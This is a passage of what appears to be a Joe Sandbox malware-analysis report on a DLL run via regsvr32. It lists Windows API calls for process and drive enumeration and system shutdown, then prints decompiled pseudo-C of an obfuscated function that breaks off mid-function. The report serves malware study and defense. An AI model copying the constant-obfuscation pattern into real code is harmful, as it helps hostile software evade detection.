                                                                                                                0x1000f402
                                                                                                                0x1000fdf9
                                                                                                                0x1000fe02
                                                                                                                0x1000fe0a
                                                                                                                0x1000fe0b
                                                                                                                0x1000fe0d
                                                                                                                0x1000fe22

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1000CD90: _memset.LIBCMT ref: 1000CE18
                                                                                                                  • Part of subcall function 1000CD90: EnumProcesses.PSAPI(?,00001000,?,?,00000000,00000103), ref: 1000CE2F
                                                                                                                  • Part of subcall function 1000CD90: OpenProcess.KERNEL32(00000410,00000000,?,?,00001000,?,?,00000000,00000103), ref: 1000CE57
                                                                                                                  • Part of subcall function 1000CD90: EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 1000CE74
                                                                                                                  • Part of subcall function 1000CD90: GetModuleFileNameExA.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 1000CE8C
                                                                                                                  • Part of subcall function 1000CD90: GetShortPathNameA.KERNEL32 ref: 1000CEA1
                                                                                                                  • Part of subcall function 1000CD90: __itoa.LIBCMT ref: 1000CEB2
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000F651
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000F665
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000F700
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000F714
                                                                                                                • GetDriveTypeA.KERNEL32(00000000), ref: 1000F741
                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000032), ref: 1000F9CC
                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000032), ref: 1000F9DC
                                                                                                                • _strcspn.LIBCMT ref: 1000FA11
                                                                                                                • TerminateThread.KERNEL32(?,00000000,Error in Fun_mycomputer,00000000,00000000), ref: 1000FB6F
                                                                                                                • SendMessageA.USER32 ref: 1000FB8E
                                                                                                                • ExitWindowsEx.USER32(00000008,00000000), ref: 1000FDCE
                                                                                                                  • Part of subcall function 1001D2C4: IsWindow.USER32(?), ref: 1001D2D3
                                                                                                                  • Part of subcall function 1003BD06: __mbscmp_l.LIBCMT ref: 1003BD10
                                                                                                                  • Part of subcall function 10026562: SendMessageA.USER32 ref: 100265A4
                                                                                                                  • Part of subcall function 1002637C: SendMessageA.USER32 ref: 1002639D
                                                                                                                  • Part of subcall function 1001D2C4: SetWindowTextA.USER32(?,10056948), ref: 1001D2FB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Drive$LogicalStrings$MessageSend$DirectoryEnumNameProcessWindowWindows$ExitFileModuleModulesOpenPathProcessesShortSystemTerminateTextThreadType__itoa__mbscmp_l_memset_strcspn
                                                                                                                • String ID: C:\Documents and Settings$Error in Fun_mycomputer$Setting\ScanSet.dat
                                                                                                                • API String ID: 2231300009-416981898
                                                                                                                • Opcode ID: 889f6e5dc4e3b898d58a28561b8f14dd400949fdfbb0250285c8566fe9270b8e
                                                                                                                • Instruction ID: 17fef6c9e4aa31712d7f858396377a431d7250849e06f074a95ef21add98d0df
                                                                                                                • Opcode Fuzzy Hash: 889f6e5dc4e3b898d58a28561b8f14dd400949fdfbb0250285c8566fe9270b8e
                                                                                                                • Instruction Fuzzy Hash: D442B1752043429FE314CB64CC91FAAB3E6FF88354F14862CF5598B2A6DBB1E905CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001AED0A(intOrPtr __ecx) {
                                                                                                                				char _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				void* _v56;
                                                                                                                				intOrPtr _v60;
                                                                                                                				char* _v64;
                                                                                                                				intOrPtr _v68;
                                                                                                                				signed int _v72;
                                                                                                                				intOrPtr _v76;
                                                                                                                				signed int _v80;
                                                                                                                				char _v84;
                                                                                                                				intOrPtr _v88;
                                                                                                                				char _v92;
                                                                                                                				char _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				signed int _v108;
                                                                                                                				signed int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				signed int _v120;
                                                                                                                				signed int _v124;
                                                                                                                				signed int _v128;
                                                                                                                				signed int _v132;
                                                                                                                				signed int _v136;
                                                                                                                				signed int _v140;
                                                                                                                				signed int _v144;
                                                                                                                				signed int _v148;
                                                                                                                				signed int _v152;
                                                                                                                				signed int _v156;
                                                                                                                				signed int _v160;
                                                                                                                				signed int _v164;
                                                                                                                				signed int _v168;
                                                                                                                				signed int _v172;
                                                                                                                				signed int _v176;
                                                                                                                				signed int _v180;
                                                                                                                				signed int _v184;
                                                                                                                				signed int _v188;
                                                                                                                				signed int _v192;
                                                                                                                				signed int _v196;
                                                                                                                				signed int _v200;
                                                                                                                				signed int _v204;
                                                                                                                				signed int _v208;
                                                                                                                				signed int _v212;
                                                                                                                				signed int _v216;
                                                                                                                				signed int _v220;
                                                                                                                				signed int _v224;
                                                                                                                				signed int _v228;
                                                                                                                				signed int _v232;
                                                                                                                				signed int _v236;
                                                                                                                				signed int _v240;
                                                                                                                				signed int _v244;
                                                                                                                				signed int _v248;
                                                                                                                				signed int _v252;
                                                                                                                				signed int _v256;
                                                                                                                				signed int _v260;
                                                                                                                				signed int _v264;
                                                                                                                				signed int _v268;
                                                                                                                				signed int _v272;
                                                                                                                				signed int _v276;
                                                                                                                				signed int _v280;
                                                                                                                				signed int _v284;
                                                                                                                				signed int _v288;
                                                                                                                				signed int _v292;
                                                                                                                				signed int _v296;
                                                                                                                				signed int _v300;
                                                                                                                				signed int _v304;
                                                                                                                				signed int _v308;
                                                                                                                				signed int _v312;
                                                                                                                				signed int _v316;
                                                                                                                				signed int _v320;
                                                                                                                				signed int _v324;
                                                                                                                				signed int _v328;
                                                                                                                				signed int _v332;
                                                                                                                				signed int _v336;
                                                                                                                				signed int _v340;
                                                                                                                				signed int _v344;
                                                                                                                				signed int _v348;
                                                                                                                				signed int _v352;
                                                                                                                				signed int _v356;
                                                                                                                				signed int _v360;
                                                                                                                				signed int _v364;
                                                                                                                				signed int _v368;
                                                                                                                				signed int _v372;
                                                                                                                				signed int _v376;
                                                                                                                				signed int _v380;
                                                                                                                				signed int _v384;
                                                                                                                				signed int _v388;
                                                                                                                				signed int _v392;
                                                                                                                				signed int _v396;
                                                                                                                				signed int _v400;
                                                                                                                				signed int _v404;
                                                                                                                				signed int _v408;
                                                                                                                				signed int _v412;
                                                                                                                				signed int _v416;
                                                                                                                				signed int _v420;
                                                                                                                				signed int _v424;
                                                                                                                				signed int _v428;
                                                                                                                				signed int _v432;
                                                                                                                				signed int _v436;
                                                                                                                				signed int _v440;
                                                                                                                				signed int _v444;
                                                                                                                				signed int _v448;
                                                                                                                				signed int _v452;
                                                                                                                				signed int _v456;
                                                                                                                				signed int _v460;
                                                                                                                				signed int _v464;
                                                                                                                				signed int _v468;
                                                                                                                				signed int _v472;
                                                                                                                				signed int _v476;
                                                                                                                				signed int _v480;
                                                                                                                				void* _t951;
                                                                                                                				intOrPtr _t957;
                                                                                                                				void* _t959;
                                                                                                                				intOrPtr* _t963;
                                                                                                                				void* _t965;
                                                                                                                				intOrPtr _t975;
                                                                                                                				intOrPtr* _t977;
                                                                                                                				intOrPtr _t978;
                                                                                                                				void* _t979;
                                                                                                                				signed int _t981;
                                                                                                                				char _t984;
                                                                                                                				void* _t993;
                                                                                                                				void* _t1001;
                                                                                                                				signed int _t1007;
                                                                                                                				signed int _t1008;
                                                                                                                				signed int _t1009;
                                                                                                                				signed int _t1010;
                                                                                                                				signed int _t1011;
                                                                                                                				signed int _t1012;
                                                                                                                				signed int _t1013;
                                                                                                                				signed int _t1014;
                                                                                                                				signed int _t1015;
                                                                                                                				signed int _t1016;
                                                                                                                				signed int _t1017;
                                                                                                                				signed int _t1018;
                                                                                                                				signed int _t1019;
                                                                                                                				signed int _t1020;
                                                                                                                				signed int _t1021;
                                                                                                                				signed int _t1022;
                                                                                                                				signed int _t1023;
                                                                                                                				signed int _t1024;
                                                                                                                				void* _t1025;
                                                                                                                				intOrPtr* _t1027;
                                                                                                                				intOrPtr _t1034;
                                                                                                                				intOrPtr _t1038;
                                                                                                                				void* _t1092;
                                                                                                                				void* _t1112;
                                                                                                                				intOrPtr _t1113;
                                                                                                                				signed int _t1115;
                                                                                                                				void* _t1116;
                                                                                                                				void* _t1121;
                                                                                                                				signed int* _t1123;
                                                                                                                				signed int* _t1125;
                                                                                                                				void* _t1129;
                                                                                                                
                                                                                                                				_t1123 =  &_v480;
                                                                                                                				_v60 = 0x5d4ddc;
                                                                                                                				_v88 = __ecx;
                                                                                                                				asm("stosd");
                                                                                                                				_t1007 = 0x6e;
                                                                                                                				_t1121 = 0;
                                                                                                                				_t1001 = 0xbffd8ba;
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				_v176 = 0xd043b1;
                                                                                                                				_v176 = _v176 + 0xffff436a;
                                                                                                                				_v176 = _v176 ^ 0x4d8dc350;
                                                                                                                				_v168 = 0xc99c0a;
                                                                                                                				_v168 = _v168 << 6;
                                                                                                                				_v168 = _v168 ^ 0x32670281;
                                                                                                                				_v476 = 0x7ced5d;
                                                                                                                				_v476 = _v476 + 0xffff2e37;
                                                                                                                				_v476 = _v476 << 0xc;
                                                                                                                				_v476 = _v476 << 0xc;
                                                                                                                				_v476 = _v476 ^ 0x94000000;
                                                                                                                				_v324 = 0x91447a;
                                                                                                                				_v324 = _v324 + 0xffff8cf5;
                                                                                                                				_v324 = _v324 + 0xe16;
                                                                                                                				_v324 = _v324 ^ 0x0090df85;
                                                                                                                				_v400 = 0xe2f84b;
                                                                                                                				_v400 = _v400 << 2;
                                                                                                                				_v400 = _v400 + 0x366e;
                                                                                                                				_v400 = _v400 ^ 0xfbbc9bf3;
                                                                                                                				_v400 = _v400 ^ 0xf8308c69;
                                                                                                                				_v180 = 0xe91a4c;
                                                                                                                				_v180 = _v180 >> 0xc;
                                                                                                                				_v180 = _v180 ^ 0x00000e91;
                                                                                                                				_v164 = 0xd525ca;
                                                                                                                				_v164 = _v164 | 0x2c0ea990;
                                                                                                                				_v164 = _v164 ^ 0x2cdfadda;
                                                                                                                				_v404 = 0x8846c8;
                                                                                                                				_v404 = _v404 >> 9;
                                                                                                                				_v404 = _v404 << 6;
                                                                                                                				_v404 = _v404 + 0xffffc86d;
                                                                                                                				_v404 = _v404 ^ 0x0010d12d;
                                                                                                                				_v336 = 0x591427;
                                                                                                                				_v336 = _v336 >> 6;
                                                                                                                				_v336 = _v336 << 0x10;
                                                                                                                				_v336 = _v336 ^ 0x64500000;
                                                                                                                				_v160 = 0x79c4ed;
                                                                                                                				_v160 = _v160 | 0x1e4dadd9;
                                                                                                                				_v160 = _v160 ^ 0x1e7dedfd;
                                                                                                                				_v248 = 0xec7fd;
                                                                                                                				_v248 = _v248 + 0x518b;
                                                                                                                				_v248 = _v248 << 0xa;
                                                                                                                				_v248 = _v248 ^ 0x3c662000;
                                                                                                                				_v216 = 0x61443b;
                                                                                                                				_v216 = _v216 ^ 0x0096bce8;
                                                                                                                				_v216 = _v216 * 0x75;
                                                                                                                				_v216 = _v216 ^ 0x7154b86f;
                                                                                                                				_v296 = 0x4047f1;
                                                                                                                				_v296 = _v296 * 0x2f;
                                                                                                                				_v296 = _v296 ^ 0xed45e741;
                                                                                                                				_v296 = _v296 ^ 0xe688d25e;
                                                                                                                				_v352 = 0x365006;
                                                                                                                				_v352 = _v352 / _t1007;
                                                                                                                				_v352 = _v352 << 0xf;
                                                                                                                				_v352 = _v352 + 0xa8f;
                                                                                                                				_v352 = _v352 ^ 0x3f3a20c1;
                                                                                                                				_v332 = 0x93ab4e;
                                                                                                                				_v332 = _v332 | 0x93144e68;
                                                                                                                				_v332 = _v332 * 0x43;
                                                                                                                				_v332 = _v332 ^ 0xa0c00c4f;
                                                                                                                				_v208 = 0x3814c1;
                                                                                                                				_v208 = _v208 + 0xffff197c;
                                                                                                                				_v208 = _v208 >> 1;
                                                                                                                				_v208 = _v208 ^ 0x001733e1;
                                                                                                                				_v212 = 0xaca34;
                                                                                                                				_t1008 = 0x27;
                                                                                                                				_v212 = _v212 / _t1008;
                                                                                                                				_v212 = _v212 + 0xffffc3ba;
                                                                                                                				_v212 = _v212 ^ 0x00011649;
                                                                                                                				_v464 = 0x43125f;
                                                                                                                				_v464 = _v464 << 4;
                                                                                                                				_v464 = _v464 << 5;
                                                                                                                				_v464 = _v464 ^ 0xf64e0625;
                                                                                                                				_v464 = _v464 ^ 0x7065ed17;
                                                                                                                				_v408 = 0xcbf812;
                                                                                                                				_v408 = _v408 >> 0x10;
                                                                                                                				_t1009 = 0x77;
                                                                                                                				_t1115 = 0x2a;
                                                                                                                				_v408 = _v408 * 0x5f;
                                                                                                                				_v408 = _v408 / _t1009;
                                                                                                                				_v408 = _v408 ^ 0x00039cfc;
                                                                                                                				_v268 = 0x64c4e6;
                                                                                                                				_v268 = _v268 / _t1115;
                                                                                                                				_v268 = _v268 + 0xffff705c;
                                                                                                                				_v268 = _v268 ^ 0x0009cf5d;
                                                                                                                				_v472 = 0x30b635;
                                                                                                                				_v472 = _v472 ^ 0x932c22dd;
                                                                                                                				_v472 = _v472 ^ 0x56aeccfb;
                                                                                                                				_v472 = _v472 ^ 0x58e8dcc7;
                                                                                                                				_v472 = _v472 ^ 0x9d551c53;
                                                                                                                				_v196 = 0xe31e25;
                                                                                                                				_v196 = _v196 + 0xffff7e32;
                                                                                                                				_v196 = _v196 ^ 0x00e67d09;
                                                                                                                				_v204 = 0x1a3cb1;
                                                                                                                				_t1010 = 0x4e;
                                                                                                                				_v204 = _v204 / _t1010;
                                                                                                                				_v204 = _v204 ^ 0x000ef299;
                                                                                                                				_v456 = 0xad6771;
                                                                                                                				_v456 = _v456 << 0xa;
                                                                                                                				_v456 = _v456 ^ 0x3184b4d0;
                                                                                                                				_t1011 = 0x28;
                                                                                                                				_v456 = _v456 / _t1011;
                                                                                                                				_v456 = _v456 ^ 0x0342ef82;
                                                                                                                				_v376 = 0x12b73a;
                                                                                                                				_v376 = _v376 + 0x4203;
                                                                                                                				_v376 = _v376 | 0xa9996942;
                                                                                                                				_v376 = _v376 + 0x1bf4;
                                                                                                                				_v376 = _v376 ^ 0xa9990fb9;
                                                                                                                				_v440 = 0xadd022;
                                                                                                                				_t1012 = 0x7c;
                                                                                                                				_v440 = _v440 / _t1012;
                                                                                                                				_v440 = _v440 >> 1;
                                                                                                                				_t1013 = 0x35;
                                                                                                                				_v440 = _v440 / _t1013;
                                                                                                                				_v440 = _v440 ^ 0x0005e3da;
                                                                                                                				_v236 = 0xf2a551;
                                                                                                                				_v236 = _v236 + 0xda65;
                                                                                                                				_t1014 = 3;
                                                                                                                				_v236 = _v236 / _t1014;
                                                                                                                				_v236 = _v236 ^ 0x00517dee;
                                                                                                                				_v360 = 0x16b23;
                                                                                                                				_v360 = _v360 << 0xb;
                                                                                                                				_v360 = _v360 + 0x38c6;
                                                                                                                				_v360 = _v360 ^ 0x0881e02d;
                                                                                                                				_v360 = _v360 ^ 0x03dc2185;
                                                                                                                				_v448 = 0x15384a;
                                                                                                                				_t1015 = 0x3b;
                                                                                                                				_v448 = _v448 * 0x26;
                                                                                                                				_v448 = _v448 / _t1015;
                                                                                                                				_v448 = _v448 >> 0xa;
                                                                                                                				_v448 = _v448 ^ 0x000f2b31;
                                                                                                                				_v432 = 0x475ebe;
                                                                                                                				_v432 = _v432 << 0xc;
                                                                                                                				_v432 = _v432 ^ 0x2de4ca71;
                                                                                                                				_v432 = _v432 >> 0xa;
                                                                                                                				_v432 = _v432 ^ 0x0017183f;
                                                                                                                				_v132 = 0x7c50fb;
                                                                                                                				_v132 = _v132 + 0x2686;
                                                                                                                				_v132 = _v132 ^ 0x0071b144;
                                                                                                                				_v316 = 0xda1159;
                                                                                                                				_v316 = _v316 ^ 0x7bc4016e;
                                                                                                                				_v316 = _v316 + 0xffff5d47;
                                                                                                                				_v316 = _v316 ^ 0x7b1ea9ce;
                                                                                                                				_v392 = 0xea3029;
                                                                                                                				_v392 = _v392 << 3;
                                                                                                                				_v392 = _v392 << 4;
                                                                                                                				_v392 = _v392 << 6;
                                                                                                                				_v392 = _v392 ^ 0x4605501f;
                                                                                                                				_v188 = 0x81dcb0;
                                                                                                                				_v188 = _v188 << 1;
                                                                                                                				_v188 = _v188 ^ 0x01054126;
                                                                                                                				_v384 = 0xe1d29d;
                                                                                                                				_t1016 = 0x7d;
                                                                                                                				_v384 = _v384 / _t1016;
                                                                                                                				_v384 = _v384 << 1;
                                                                                                                				_v384 = _v384 * 0x11;
                                                                                                                				_v384 = _v384 ^ 0x003cd7a5;
                                                                                                                				_v424 = 0x4ff69;
                                                                                                                				_v424 = _v424 >> 4;
                                                                                                                				_v424 = _v424 >> 4;
                                                                                                                				_v424 = _v424 + 0x2fc0;
                                                                                                                				_v424 = _v424 ^ 0x000e73a3;
                                                                                                                				_v368 = 0x83687d;
                                                                                                                				_v368 = _v368 >> 9;
                                                                                                                				_v368 = _v368 << 9;
                                                                                                                				_v368 = _v368 << 2;
                                                                                                                				_v368 = _v368 ^ 0x020a12e7;
                                                                                                                				_v480 = 0xb20df;
                                                                                                                				_v480 = _v480 ^ 0xe5e5b578;
                                                                                                                				_v480 = _v480 | 0xb0ea231f;
                                                                                                                				_v480 = _v480 ^ 0x1f4cc622;
                                                                                                                				_v480 = _v480 ^ 0xeaa5fda9;
                                                                                                                				_v416 = 0xdb5857;
                                                                                                                				_v416 = _v416 + 0xffff5d0e;
                                                                                                                				_v416 = _v416 >> 0xf;
                                                                                                                				_v416 = _v416 * 0x1e;
                                                                                                                				_v416 = _v416 ^ 0x0009eba5;
                                                                                                                				_v308 = 0x3690ba;
                                                                                                                				_v308 = _v308 * 0x4d;
                                                                                                                				_v308 = _v308 | 0x3dd138d0;
                                                                                                                				_v308 = _v308 ^ 0x3df04435;
                                                                                                                				_v260 = 0xcc31d2;
                                                                                                                				_t1017 = 0xd;
                                                                                                                				_v260 = _v260 * 0x51;
                                                                                                                				_v260 = _v260 / _t1017;
                                                                                                                				_v260 = _v260 ^ 0x04fb72da;
                                                                                                                				_v300 = 0x4a247d;
                                                                                                                				_v300 = _v300 >> 0xa;
                                                                                                                				_v300 = _v300 + 0x5084;
                                                                                                                				_v300 = _v300 ^ 0x0000ef03;
                                                                                                                				_v460 = 0x94273c;
                                                                                                                				_v460 = _v460 + 0xffffe108;
                                                                                                                				_v460 = _v460 + 0xa0c2;
                                                                                                                				_v460 = _v460 | 0x5b8fe8c2;
                                                                                                                				_v460 = _v460 ^ 0x5b9a2571;
                                                                                                                				_v220 = 0x462d02;
                                                                                                                				_v220 = _v220 + 0xffff69d9;
                                                                                                                				_t1018 = 0x36;
                                                                                                                				_v220 = _v220 / _t1018;
                                                                                                                				_v220 = _v220 ^ 0x000f711e;
                                                                                                                				_v468 = 0x7d5a38;
                                                                                                                				_v468 = _v468 << 0x10;
                                                                                                                				_v468 = _v468 + 0xffff9669;
                                                                                                                				_v468 = _v468 << 0xc;
                                                                                                                				_v468 = _v468 ^ 0x79678ae9;
                                                                                                                				_v100 = 0xe0249c;
                                                                                                                				_v100 = _v100 << 0xf;
                                                                                                                				_v100 = _v100 ^ 0x1247e62f;
                                                                                                                				_v172 = 0xf6d9fe;
                                                                                                                				_t1019 = 0x4f;
                                                                                                                				_v172 = _v172 / _t1019;
                                                                                                                				_v172 = _v172 ^ 0x00004bf0;
                                                                                                                				_v292 = 0x91fc75;
                                                                                                                				_v292 = _v292 + 0xffffab0d;
                                                                                                                				_v292 = _v292 + 0x90d;
                                                                                                                				_v292 = _v292 ^ 0x0090e8ed;
                                                                                                                				_v124 = 0xd703b7;
                                                                                                                				_v124 = _v124 >> 8;
                                                                                                                				_v124 = _v124 ^ 0x0009399a;
                                                                                                                				_v252 = 0xfa091e;
                                                                                                                				_t1020 = 0x2e;
                                                                                                                				_v252 = _v252 * 6;
                                                                                                                				_v252 = _v252 + 0x2994;
                                                                                                                				_v252 = _v252 ^ 0x05d90a1d;
                                                                                                                				_v108 = 0xdaad96;
                                                                                                                				_v108 = _v108 / _t1020;
                                                                                                                				_v108 = _v108 ^ 0x0001c1a8;
                                                                                                                				_v436 = 0x91be2c;
                                                                                                                				_v436 = _v436 ^ 0x0c1c9158;
                                                                                                                				_v436 = _v436 + 0xffffde1f;
                                                                                                                				_v436 = _v436 + 0xffff5077;
                                                                                                                				_v436 = _v436 ^ 0x0c8253ce;
                                                                                                                				_v104 = 0x9f6bcc;
                                                                                                                				_v104 = _v104 << 0xe;
                                                                                                                				_v104 = _v104 ^ 0xdaf7a407;
                                                                                                                				_v444 = 0x85ba2d;
                                                                                                                				_v444 = _v444 + 0xffff79b0;
                                                                                                                				_v444 = _v444 * 0x68;
                                                                                                                				_v444 = _v444 << 1;
                                                                                                                				_v444 = _v444 ^ 0x6c30bf58;
                                                                                                                				_v452 = 0xadaed;
                                                                                                                				_v452 = _v452 << 9;
                                                                                                                				_v452 = _v452 ^ 0xd8d8b7e4;
                                                                                                                				_v452 = _v452 << 5;
                                                                                                                				_v452 = _v452 ^ 0xada01a1c;
                                                                                                                				_v412 = 0xfcf3aa;
                                                                                                                				_v412 = _v412 << 5;
                                                                                                                				_v412 = _v412 >> 0xf;
                                                                                                                				_t1021 = 0x5a;
                                                                                                                				_v412 = _v412 / _t1021;
                                                                                                                				_v412 = _v412 ^ 0x0008a868;
                                                                                                                				_v156 = 0xd148e0;
                                                                                                                				_t1022 = 0x32;
                                                                                                                				_v156 = _v156 * 0x63;
                                                                                                                				_v156 = _v156 ^ 0x50eeb8aa;
                                                                                                                				_v420 = 0x3adc07;
                                                                                                                				_v420 = _v420 | 0xac1614d0;
                                                                                                                				_v420 = _v420 ^ 0x49c14ce5;
                                                                                                                				_v420 = _v420 >> 0xe;
                                                                                                                				_v420 = _v420 ^ 0x000ed7ad;
                                                                                                                				_v428 = 0xf083ed;
                                                                                                                				_v428 = _v428 / _t1022;
                                                                                                                				_v428 = _v428 + 0xffffa306;
                                                                                                                				_v428 = _v428 | 0x324b1735;
                                                                                                                				_v428 = _v428 ^ 0x3248f5c0;
                                                                                                                				_v200 = 0xf0edb;
                                                                                                                				_v200 = _v200 * 0x76;
                                                                                                                				_v200 = _v200 ^ 0x06ff5ce1;
                                                                                                                				_v116 = 0xe17701;
                                                                                                                				_v116 = _v116 ^ 0x73071077;
                                                                                                                				_v116 = _v116 ^ 0x73e83ced;
                                                                                                                				_v140 = 0xe22e64;
                                                                                                                				_v140 = _v140 ^ 0x45e74181;
                                                                                                                				_v140 = _v140 ^ 0x450029a9;
                                                                                                                				_v284 = 0x4a0946;
                                                                                                                				_v284 = _v284 / _t1115;
                                                                                                                				_v284 = _v284 ^ 0x0826a2c0;
                                                                                                                				_v284 = _v284 ^ 0x0828fcba;
                                                                                                                				_v344 = 0x8fc99c;
                                                                                                                				_v344 = _v344 ^ 0x9451be15;
                                                                                                                				_v344 = _v344 + 0x391b;
                                                                                                                				_v344 = _v344 ^ 0x94d52540;
                                                                                                                				_v276 = 0x63cece;
                                                                                                                				_v276 = _v276 | 0xf7d78752;
                                                                                                                				_v276 = _v276 * 0x6d;
                                                                                                                				_v276 = _v276 ^ 0x9481d3ca;
                                                                                                                				_v396 = 0x80226a;
                                                                                                                				_v396 = _v396 | 0xff9de7ff;
                                                                                                                				_v396 = _v396 ^ 0xff9353a4;
                                                                                                                				_v244 = 0x145c83;
                                                                                                                				_v244 = _v244 >> 0xd;
                                                                                                                				_v244 = _v244 ^ 0x4b8835f2;
                                                                                                                				_v244 = _v244 ^ 0x4b8afe44;
                                                                                                                				_v192 = 0xc93bfb;
                                                                                                                				_v192 = _v192 * 0x29;
                                                                                                                				_v192 = _v192 ^ 0x20315894;
                                                                                                                				_v184 = 0xe9f304;
                                                                                                                				_v184 = _v184 >> 8;
                                                                                                                				_v184 = _v184 ^ 0x000503fd;
                                                                                                                				_v320 = 0xec550;
                                                                                                                				_v320 = _v320 + 0xffff7159;
                                                                                                                				_v320 = _v320 * 0xf;
                                                                                                                				_v320 = _v320 ^ 0x00d867c3;
                                                                                                                				_v328 = 0x18a9c;
                                                                                                                				_v328 = _v328 | 0x8e7fb7df;
                                                                                                                				_v328 = _v328 ^ 0x8e7efec0;
                                                                                                                				_v388 = 0x12a0d8;
                                                                                                                				_v388 = _v388 >> 4;
                                                                                                                				_t1023 = 0x33;
                                                                                                                				_v388 = _v388 * 0x32;
                                                                                                                				_v388 = _v388 * 0x24;
                                                                                                                				_v388 = _v388 ^ 0x082cdd2f;
                                                                                                                				_v120 = 0x4e930;
                                                                                                                				_v120 = _v120 | 0x63948bd2;
                                                                                                                				_v120 = _v120 ^ 0x63942f96;
                                                                                                                				_v148 = 0xdd016e;
                                                                                                                				_v148 = _v148 ^ 0x208ce98d;
                                                                                                                				_v148 = _v148 ^ 0x20594f04;
                                                                                                                				_v112 = 0x3bb12e;
                                                                                                                				_v112 = _v112 * 0x30;
                                                                                                                				_v112 = _v112 ^ 0x0b341126;
                                                                                                                				_v228 = 0x46e126;
                                                                                                                				_v228 = _v228 ^ 0xaf065162;
                                                                                                                				_v228 = _v228 << 5;
                                                                                                                				_v228 = _v228 ^ 0xe815acce;
                                                                                                                				_v304 = 0x1c406f;
                                                                                                                				_v304 = _v304 / _t1023;
                                                                                                                				_v304 = _v304 << 2;
                                                                                                                				_v304 = _v304 ^ 0x0007e3c5;
                                                                                                                				_v372 = 0xe04ae2;
                                                                                                                				_v372 = _v372 | 0x7670b066;
                                                                                                                				_v372 = _v372 << 0xb;
                                                                                                                				_v372 = _v372 + 0x3a24;
                                                                                                                				_v372 = _v372 ^ 0x87d77805;
                                                                                                                				_v380 = 0x27e18e;
                                                                                                                				_t1024 = 6;
                                                                                                                				_v380 = _v380 / _t1024;
                                                                                                                				_v380 = _v380 ^ 0x8c3979ce;
                                                                                                                				_v380 = _v380 + 0x3fff;
                                                                                                                				_v380 = _v380 ^ 0x8c4bf016;
                                                                                                                				_v312 = 0xfd3f6c;
                                                                                                                				_v312 = _v312 << 0x10;
                                                                                                                				_v312 = _v312 + 0x73d4;
                                                                                                                				_v312 = _v312 ^ 0x3f640e1b;
                                                                                                                				_v356 = 0x79a710;
                                                                                                                				_v356 = _v356 ^ 0x5f97fd28;
                                                                                                                				_v356 = _v356 << 0xb;
                                                                                                                				_v356 = _v356 << 0xf;
                                                                                                                				_v356 = _v356 ^ 0xe002f938;
                                                                                                                				_v256 = 0x359a90;
                                                                                                                				_v256 = _v256 << 4;
                                                                                                                				_v256 = _v256 | 0x42bdba1a;
                                                                                                                				_v256 = _v256 ^ 0x43f2672f;
                                                                                                                				_v264 = 0xc40429;
                                                                                                                				_v264 = _v264 + 0xffff3e34;
                                                                                                                				_v264 = _v264 + 0x4c31;
                                                                                                                				_v264 = _v264 ^ 0x00cc0edc;
                                                                                                                				_v272 = 0x3adb11;
                                                                                                                				_v272 = _v272 + 0x7fbb;
                                                                                                                				_v272 = _v272 + 0xffff8c4e;
                                                                                                                				_v272 = _v272 ^ 0x00395894;
                                                                                                                				_v364 = 0xede62e;
                                                                                                                				_v364 = _v364 << 5;
                                                                                                                				_v364 = _v364 << 0xc;
                                                                                                                				_v364 = _v364 + 0xffff6bd8;
                                                                                                                				_v364 = _v364 ^ 0xcc5c8588;
                                                                                                                				_v280 = 0xe2350e;
                                                                                                                				_v280 = _v280 | 0xe7ac37db;
                                                                                                                				_v280 = _v280 ^ 0xce4fc911;
                                                                                                                				_v280 = _v280 ^ 0x29ae3a29;
                                                                                                                				_v288 = 0x4fc091;
                                                                                                                				_v288 = _v288 * 9;
                                                                                                                				_v288 = _v288 ^ 0xfa91f215;
                                                                                                                				_v288 = _v288 ^ 0xf850816a;
                                                                                                                				_v144 = 0x98e9a9;
                                                                                                                				_t1116 = 0xb28fc88;
                                                                                                                				_v144 = _v144 | 0x2af3608c;
                                                                                                                				_t1112 = 0xf04754f;
                                                                                                                				_v144 = _v144 ^ 0x2af0cf38;
                                                                                                                				_v152 = 0xade2a0;
                                                                                                                				_v152 = _v152 | 0xfc137e07;
                                                                                                                				_v152 = _v152 ^ 0xfcb42ea1;
                                                                                                                				_v232 = 0x80e6ba;
                                                                                                                				_v232 = _v232 * 0xc;
                                                                                                                				_v232 = _v232 + 0x1df0;
                                                                                                                				_v232 = _v232 ^ 0x06061ec5;
                                                                                                                				_v240 = 0x84ee6f;
                                                                                                                				_v240 = _v240 << 5;
                                                                                                                				_v240 = _v240 >> 0xd;
                                                                                                                				_v240 = _v240 ^ 0x0009062a;
                                                                                                                				_v224 = 0x167e33;
                                                                                                                				_v224 = _v224 * 0x30;
                                                                                                                				_v224 = _v224 | 0x16acd527;
                                                                                                                				_v224 = _v224 ^ 0x16b9a344;
                                                                                                                				_v136 = 0x313d01;
                                                                                                                				_v136 = _v136 << 5;
                                                                                                                				_v136 = _v136 ^ 0x06279659;
                                                                                                                				_v340 = 0x41df81;
